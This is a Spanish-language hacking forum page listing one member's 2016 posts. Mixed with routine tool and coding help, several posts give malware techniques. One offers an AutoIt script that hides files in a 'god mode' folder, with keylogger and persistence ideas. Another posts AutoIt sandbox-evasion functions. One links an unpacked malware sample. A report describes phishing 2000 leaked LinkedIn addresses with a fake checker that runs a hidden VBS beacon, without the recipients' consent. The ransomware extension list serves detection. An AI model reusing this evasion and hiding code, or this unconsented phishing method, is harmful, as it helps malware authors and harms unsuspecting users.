This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - sadfud

Pages: 1 ... 9 10 [11]
201
Dudas y pedidos generales / Re:El theharvester no me busca en Kali Linux.
« on: October 15, 2016, 10:00:45 am »
Mmm a lo mejor es por que estas haciendo que google busque en google. De todas formas, ten en cuenta que no siempre va a encontrar emails en la web objetivo. Para asegurarte de que no funcione busca una web y mira a ver si tiene emails, fijate en el pie de pagina a ver si hay uno de contacto, si lo hay lanza el harvester a ver si lo coge.

202
Dudas y pedidos generales / Re:Ayuda con el código en c++
« on: October 13, 2016, 12:56:27 pm »
Buenas y bienvenido a underc0de, varias coasas:
1. Creo que el enunciado esta incompleto, falta por ejemplo una declaracion de variable "ant" tipos y demas
2. Interpreto que lo que te piden es traducir ese pseudocodigo a cpp
3. Te paso el como quedaria segun interpreto yo el enunciado

Code: (cpp) You are not allowed to view links. Register or Login
#include <iostream>
using namespace std;
int main() {
int cero, act, ant, s2, s2n;
bool hay2;
hay2 = false;
system("cls");
/*
no entiendo a que se refiere esta parte
iterar
leerM(act,"Valor:");
salirSi(act ES 0.0); cerrar programa?
*/

if (ant != 0) {} //en este condicional falta el statement en el enunciado
if (hay2) { //esto no tiene mucho sentido porque el booleano "hay2" esta fijado en false

s2 = ant + act;
}

if (s2 < s2n) {

s2n = s2;
}

// esto realmente tiene pinta de ser un condicional anidado o quizas usando case? no esta nada claro el enunciado, asique te lo hago en un condicional a parte que funciona igual
if (hay2 = true) { //no tiene sentido porq hay2 esta seteado en false y nunca va a realizar el statement
s2n = ant + act;
//esto es igual de inutil que el primer condicional
}
ant = act;
system("pause");
return 0;

4.- No te acostumbres a que te hagan los ejercicios tal cual te los dan, dudas concretas si, haz caso a Unname. El unico motivo de que te lo haya resuelto es que me vuiene bien para practicar cpp.

Saludos y para la proxima echale un vistazo a este hilo You are not allowed to view links. Register or Login

203
Dudas y pedidos generales / Re:Link de bootnet houdini
« on: October 12, 2016, 04:13:16 pm »
Creo que no se refiere al h-worm, houdini público hace poco una especie de botnet en vbs pero sin panel web. Es como un híbrido entre botnet y rat. Cuando llegué a casa lo buscó y lo público.
Saludos

204
Hola underc0deanos

Dejo este reportaje que me ha parecido interesante

205

Buenas underc0deanos

En esta entrada mostrare como es posible explotar la característica de windows god mode y aprovecharla para la creación y ocultación de malware con un simple código de cuatro lineas.

Explicación oficial de microsoft sobre esta característica de windows (You are not allowed to view links. Register or Login).

El código a continuación mostrado es un simple script en autoit que automatiza este proceso

Code: You are not allowed to view links. Register or Login
Local $directorio = "C:\Users\usuario\AppData\Roaming\godmode.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}"
Local $godmode = "C:\Users\usuario\AppData\Roaming\com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}"
DirCreate ($directorio)
Dirmove ($directorio , $godmode , 1)

*Nota: En caso de desconocer el nombre de usuario se puede usar @Username

Pero como puede esto ser aprovechado por un desarrollador de malware?

Seguro que hay muchas formas de aprovechar esta característica, a mi de entrada se me ocurren dos:

La primera consistiría en crear una entrada en el registro para iniciar nuestra aplicación en el arranque, copiando previamente el binario a esa localizacion.

La segunda y poniendo un ejemplo practico podría ser aprovecharnos de esta característica con un keylogger, almacenando los logs en esa localización, de este modo se podrían almacenar tranquilamente en texto plano sin riesgo de ser descubiertos.

Un saludo

206
Buenas

Genera el sitemap de tu web y mandaselo a google para que sus spiders te indexen correctamente
Te dejo como se hace: You are not allowed to view links. Register or Login

207
Dudas y pedidos generales / Re:[SOLUCIONADO] RAT para sistema iOS
« on: October 09, 2016, 05:58:33 pm »
Te dejo un par de enlaces a informes sobre codigo dañino en iOS por si te es util o te da alguna idea

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login


208
Muy buena la tool, ademas su autor es un tio dpm  8) 8)

Si se cae el link o cualquier cosa avisad que la resubo

Un saludo

209
Dejo una muestra de este malware desempaquetado:

You are not allowed to view links. Register or Login

Contraseña: infected

210
Análisis y desarrollo de malwares / Re:ID ransomware: herramienta online
« on: October 09, 2016, 05:33:56 pm »
Muy buen servicio web

Dejo una lista de las extensiones con las que actuan los ransomware mas conocidos y el nombre de notas de rescate

Code: You are not allowed to view links. Register or Login
*.*cry
*.*crypto
*.*darkness
*.*enc*
*.*exx
*.*kb15
*.*kraken
*.*locked
*.*nochance
*.0x0
*.1999
*.73i87A
*.7z.encrypted
*.aaa
*.abc
*.AES256
*.better_call_saul
*.bleep
*.btc
*.BTC
*.btcbtcbtc
*.canihelpyou
*.cbf
*.ccc
*.cerber
*.cerber3
*[email protected]_com
*.clf
*.coverton
*.crime
*.crinf
*.crjoker
*.cry
*.crypt
*.crypted
*.crypto
*.crypto*
*.cryptolocker
*.cryptotorlocker*
*.CryptoTorLocker2015!
*.CrySiS
*.ctb2
*.CTB2
*.ctbl
*.ctbl
*.CTBL
*.czvxce
*.darkness
*.da_vinci_code
*[email protected]_com
*.ecc
*.enc
*.encedRSA
*.enciphered
*.EnCiPhErEd
*.Encrypted
*.encrypted*
*.encryptedAES
*.encryptedRSA
*.enigma
*.exx
*.ezz
*.flyper
*.frtrss
*.fucked
*.fun
*.FUN
*.good
*[email protected]_com
*.gsw
*.gws
*.GWS
*.ha3
*.HA3
*.hb15
*[email protected]*.net
*.html
*.hydracrypt*
*.iloveworld
*.JUST
*.justbtcwillhelpyou
*.kb15
*[email protected]_com
*.kimcilware
*.KKK
*.kraken
*.lechiffre
*.LeChiffre
*.locked
*.locky
*.lol!
*.LOL!
*.magic
*.micro
*.mp3
*[email protected]_com
*.nochance
*.obleep
*.odin
*.omg!
*.OMG!
*[email protected]_com
*.oshit
*.p5tkjw
*[email protected]_com
*.PoAr2w
*.pzdc
*.r16m*
*.R16M01D05
*.R5A
*.r5a
*.RADAMANT
*.rdm
*.RDM
*[email protected]_com
*.remind
*.rokku
*.rrk
*.RRK
*.sanction
*.sport
*.supercrypt
*.SUPERCRYPT
*.surprise
*.toxcrypt
*[email protected]_com
*.ttt
*.vault
*.vvv
*.xort
*.xrnt
*.XRNT
*.xrtn
*.xtbl
*.XTBL
*.xxx
*.xyz
*.zzz
*@gmail_com_*
*@india.com*
*_H_e_l_p_RECOVER_INSTRUCTIONS*
*_LAST
*cpyt*
*crypt*
*decipher*
*help_restore*.*
*help_your_files*.*
*how_to_recover*.*
*install_tor*.*
*keemail.me*
*qq_com*
*restore_fi*.*
*ukr.net*
*want your files back.*
_crypt
_DECRYPT_INFO_*
_ryp
AllFilesAreLocked*.bmp
ATTENTION!!!.txt
confirmation.key
Decrypt.exe
DECRYPT_INSTRUCTION.HTML
DECRYPT_INSTRUCTION.TXT
DECRYPT_INSTRUCTIONS.HTML
DECRYPT_INSTRUCTIONS.TXT
DecryptAllFiles*.txt
DecryptAllFiles.txt
enc_files.txt
HELP_DECRYPT.HTML
HELP_DECRYPT.lnk
HELP_DECRYPT.PNG
HELP_DECRYPT.TXT
HELP_RESTORE_FILES.txt
HELP_TO_DECRYPT_YOUR_FILES.txt
HELP_TO_SAVE_FILES.txt
how to decrypt aes files.lnk
How_Decrypt.html
How_Decrypt.txt
HowDecrypt.txt
last_chance.txt
message.txt
MESSAGE.txt
oor*.
recovery_file.txt
recovery_key.txt
RECOVERY_KEY.TXT
restore_files*.txt
restore_files.txt
vault.hta
vault.key
vault.txt
*.zepto
*.venusf

211
Desarrollo y modificación de malwares / Funciones antiemulacion [Autoit]
« on: October 09, 2016, 05:19:45 pm »
Buenas, dejo estas funciones codeadas en autoit, sirven para detectar si el proceso esta siendo ejecutado en un sandbox o otro tipo de entorno emulado, vease el deepscreen de Avast


Code: You are not allowed to view links. Register or Login
#cs ----------------------------------------------------------------------------
 AutoIt Version: 3.3.8.1
 Author:         Blau
 Thanks to: SadFud
#ce ----------------------------------------------------------------------------
 
#include <Misc.au3>
 
Local $aParams[3] ;Array que contiene los parámetros del callback
$aParams[0] = "CallArgArray" ;Obligatorio para la función Call
$aParams[1] = "Caca" ;$sTitle
$aParams[2] = "Pedo" ;$sMessage
 
AntiEmulationByMouse("Funciona", $aParams)
AntiEmulationByFreeSpace("Funciona", $aParams)
AntiEmulationByPixel("Funciona", $aParams)
AntiEmulationByWindow("Funciona", $aParams)
AntiEmulationByKey(41, "Funciona", $aParams)
 
Func AntiEmulationByMouse($sFunction, $aParams)
    Local $aPos = MouseGetPos() ;Obtiene la posición del ratón
    Local $bPos = MouseGetPos() ;Obtiene la posición del ratón otra vez
    While $aPos[0] = $bPos[0] And $aPos[1] = $bPos[1] ;Si las posiciones son iguales
        Sleep(100)  ;Esperamos 100 milisegundos
        $bPos = MouseGetPos() ;Obtenemos de nuevo la posición del ratón
    WEnd
    Call($sFunction, $aParams) ;Llamamos a la función callback
EndFunc
 
Func AntiEmulationByWindow($sFunction, $aParams)
    Local $aWindow = WinGetTitle("[ACTIVE]")
    Local $bWindow = WinGetTitle("[ACTIVE]")
    While $aWindow = $bWindow
        Sleep(100)
        $bWindow = WinGetTitle("[ACTIVE]")
    WEnd
    Call($sFunction, $aParams)
EndFunc
 
Func AntiEmulationByKey($sKey, $sFunction, $aParams) ;https://www.autoitscript.com/autoit3/docs/libfunctions/_IsPressed.htm
    While Not _IsPressed($sKey)
        Sleep(100)
    WEnd
    Call($sFunction, $aParams)
EndFunc
 
Func AntiEmulationByFreeSpace($sFunction, $aParams)
    Local $aSpace = DriveSpaceFree(@HomeDrive & "\")
    Local $bSpace = DriveSpaceFree(@HomeDrive & "\")
    While $aSpace = $bSpace
        Sleep(100)
        $bSpace = DriveSpaceFree(@HomeDrive & "\")
    WEnd
    Call($sFunction, $aParams)
EndFunc
 
Func AntiEmulationByPixel($sFunction, $aParams)
    Local $nRandomX = Random(0, @DeskTopHeight, 1)
    Local $nRandomY = Random(0, @DeskTopWidth, 1)
    Local $aPixel = PixelGetColor ($nRandomX, $nRandomY)
    Local $bPixel = PixelGetColor ($nRandomX, $nRandomY)
    While $aPixel = $bPixel
        Sleep(100)
       $bPixel = PixelGetColor ($nRandomX, $nRandomY)
    WEnd
    Call($sFunction, $aParams)
EndFunc
 
Func Funciona($sTitle, $sMessage)
    MsgBox(0, $sTitle, $sMessage)
EndFunc

Un saludo.

212
Hacking / Re:Cuatro maneras de hackear un cajero automático
« on: October 09, 2016, 04:29:33 pm »
Buen post :D

A principios de este año pillaron a los responsables del desarrollo de Tyupkin
You are not allowed to view links. Register or Login

213
Seguridad / Trabajo de investigacion: Operación link azul
« on: October 07, 2016, 05:39:04 pm »
Buenas underc0deanos;



*Esta entrada es la parte final de un proceso de investigación. En ningún momento de la misma se ha visto comprometida la información de ningún equipo.*


En esta entrada presentare un trabajo de investigación; el objetivo es comprobar la vulnerabilidad de los usuarios a una posible infección, en este caso usando como vector de ataque el hackeo a linkedin.

Para ello cree un pequeño programa en vb.net  simulando ser una herramienta para comprobar si la cuenta del usuario había sido publicada a través de su dirección de e-mail.

El programa en cuestion es el siguiente:





El programa es pura fachada evidentemente y no comprueba absolutamente nada.

Primera parte de la operación link azul:

Elegí 2000 email aleatorios de la base de datos de linkedin (seleccioné 1000 de España, para formar una estadística a parte)

El vector de infección para la propagación del programa fue un e-mail con dirección falsa y un archivo adjunto.



Como veis, nada sofisticado, sin invertir casi nada en la parte de ingeniería social.

Funcionamiento del archivo cebo:

El archivo simplemente crea un pequeño script en vbs para visitar una web sin abrir el navegador.

Code: (vb) You are not allowed to view links. Register or Login
Set IE = CreateObject("InternetExplorer.Application")
IE.Visible = False
IE.Navigate "URL"

*Los créditos del script van en este caso para Adwind. Allí donde estés, un saludo  ;)

Cuando el usuario "comprueba su email" el programa simplemente ejecuta el archivo y lo borra.

Resultados:

Los resultados realmente me sorprendieron, empezaremos primero por los de España:

De 1000 emails enviados la web donde se recopilaban las ips y se pintaba el mapa, registro ni mas ni menos que 435



Esto nos deja el escalofriante dato de que un 43,5% de los usuarios ejecutaron y "comprobaron" su email.

En total el numero de usuarios afectados del total de 2000 fueron 1231 un 61,55%.

En el top 5 de paises se encuentran



En total hubo usuarios afectados en 62 paises

Como se puede observar en el mapa, los países mas afectados en su mayoría han sido de habla hispana, quizás si el mensaje hubiera estado escrito en ingles la cosa habría cambiado.

Conclusiones:

Al recopilar resultados me quede realmente sorprendido, no esperaba tener un ratio de infección de mas del 10-20%, pero la realidad a triplicado mis expectativas. Ante esto creo que hay mucho que reflexionar, que hubiera pasado si en vez de un script para realizar una conexión, el archivo fueses un ransomware, o un spyware, o cualquier tipo de malware? Realmente es la gente tan vulnerable? Eso parece... Por cuanto tiempo serán las personas el eslabón mas débil de la cadena? Me temo que siempre sera así. Afortunadamente desde organismos como INCIBE (You are not allowed to view links. Register or Login) se lleva a cabo una ardua tarea de conciencian sobre el uso responsable de la tecnología; y bajo mi punto de vista este es el camino que mas hay que trabajar en la lucha contra el cibercrimen, la educación, es la base de todo, y en la tecnología no iba a ser menos.

Por ultimo quiero lanzar también una critica a todas las compañías de antivirus, estoy convencido que muchas habrán recibido la muestra, en la web que recopilaba las visitas se indicaba que todo era una investigación y que si algún investigador de seguridad, ya fuera de alguna empresa o independiente , llegaba ahí, que contactase. Nadie lo hizo. Ademas, la campaña fue lanzada a principios de Julio, han tenido dos meses para mover ficha, meter el dominio en lista negra... algo.. y este ha sido el resultado:


Eso es todo.

Un saludo.

214
Seguridad / Riesgos de uso de Whatsapp
« on: October 07, 2016, 05:09:59 pm »

Saludos underc0deanos

Este post tratara un tema que ha cobrado relevancia en España, a raiz de los cambios en las políticas del uso de los datos de los usuarios por parte de Whatsapp tras su compra por Facebook.

"(Madrid, 5 de octubre de 2016). La Agencia Española de Protección de Datos ha iniciado de oficio actuaciones previas de investigación para examinar las comunicaciones de datos personales realizadas entre Whatsapp y Facebook, así como los tratamientos que dicha comunicación genera. Estas actuaciones tienen por objeto estudiar si los extremos mencionados respetan la legislación española de protección de datos así como determinar, en su caso, las responsabilidades correspondientes.

La investigación se centrará, entre otros aspectos, en qué información de los usuarios de Whatsapp se recoge y envía a Facebook, los fines para los que se utiliza, los plazos de conservación, o las opciones que se ofrecen a los usuarios para oponerse a los tratamientos de su información personal.

El pasado mes de agosto WhatsApp actualizó los términos de su servicio y la política de privacidad, introduciendo cambios sobre la forma en la que maneja la información personal de sus usuarios. La AEPD, como hace habitualmente cuando surgen inquietudes con respecto al impacto que determinados productos o servicios pueden tener sobre la privacidad y la protección de datos de los ciudadanos, ya anunció entonces que estaba estudiando los cambios introducidos por la compañía.

Esta actuación de la Agencia española está en línea y se coordinará con iniciativas similares de Autoridades de Protección de Datos como Alemania, Italia o Reino Unido, si bien cada una actúa ejerciendo las potestades que le confieren sus respectivos ordenamientos nacionales.
"

Se puede ampliar en: You are not allowed to view links. Register or Login

Junto con esta actuación por parte de la AEPD el CERT del centro criptológico nacional (dependiente del CNI) organismo encargado de la protección sobre sistemas clasificados y sobre sistemas de las Administraciones Públicas y de empresas y organizaciones de interés estratégico, ha publicado un informe donde detalla los riesgos de uso de Whatsapp, explicando la in-eficiencia de las medidas de seguridad que ofrece esta aplicación.

A continuación dejo un enlace al informe completo del CERT donde se analiza en profundidad la seguridad de whatsapp:

You are not allowed to view links. Register or Login

Un saludo.

Pages: 1 ... 9 10 [11]